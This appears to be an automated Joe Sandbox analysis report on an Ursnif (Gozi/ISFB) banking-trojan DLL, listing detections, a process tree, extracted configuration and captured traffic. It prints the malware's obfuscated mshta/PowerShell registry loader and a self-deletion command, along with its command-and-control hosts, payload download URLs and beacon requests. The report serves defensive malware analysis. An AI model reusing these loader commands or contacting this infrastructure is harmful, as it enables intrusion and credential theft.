Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2oCOO5LbPu.dll

Overview

General Information

Sample Name:2oCOO5LbPu.dll
Analysis ID:620323
MD5:1217ff59e80cdae525287f2c6e9a43c6
SHA1:71760323e2c6528c2d346d85c9a138edcea984aa
SHA256:315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
Tags:dllgeoGoziISFBITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3708 cmdline: loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4640 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2284 cmdline: rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 7000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 4040 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5016 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • nslookup.exe (PID: 5996 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
            • cmd.exe (PID: 3248 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4724 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5472 cmdline: cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4960 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
          • rundll32.exe (PID: 5180 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6576 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6972 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 46 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.52f94a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.52f94a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.2.rundll32.exe.36d0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.586a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.5916b40.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/04/22-16:19:17.575336 05/04/22-16:19:17.575336
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:22.118696 05/04/22-16:21:22.118696
                      SID:2823044
                      Source Port:49824
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:19:19.326271 05/04/22-16:19:19.326271
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:18:57.385228 05/04/22-16:18:57.385228
                      SID:2033203
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:20.986284 05/04/22-16:21:20.986284
                      SID:2031743
                      Source Port:49823
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:21.354584 05/04/22-16:21:21.354584
                      SID:2031744
                      Source Port:49823
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:23.154439 05/04/22-16:21:23.154439
                      SID:2823044
                      Source Port:49825
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:19:18.765869 05/04/22-16:19:18.765869
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:35.078524 05/04/22-16:21:35.078524
                      SID:2831962
                      Source Port:49836
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:37.325898 05/04/22-16:21:37.325898
                      SID:2831962
                      Source Port:49845
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://193.56.146.127/stilak32.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gifAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/stilak64.rarAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/cook32.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmpAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/cook64.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmpAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: 2oCOO5LbPu.dllReversingLabs: Detection: 50%
                      Machine Learning detection for sample
                      Source: 2oCOO5LbPu.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_036D5FBB
                      Source: 2oCOO5LbPu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0627FD47
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_062765C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0628BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_062799BC

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: gamexperts.net
                      Source: C:\Windows\explorer.exeDomain query: cabrioxmdes.at
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49759 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49761 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49761 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2031743 ET TROJAN Ursnif Payload Request (cook32.rar) 192.168.2.4:49823 -> 193.56.146.127:80
                      Source: TrafficSnort IDS: 2031744 ET TROJAN Ursnif Payload Request (cook64.rar) 192.168.2.4:49823 -> 193.56.146.127:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49845 -> 116.121.62.237:80
                      Uses nslookup.exe to query domains
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machine
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: global trafficHTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache
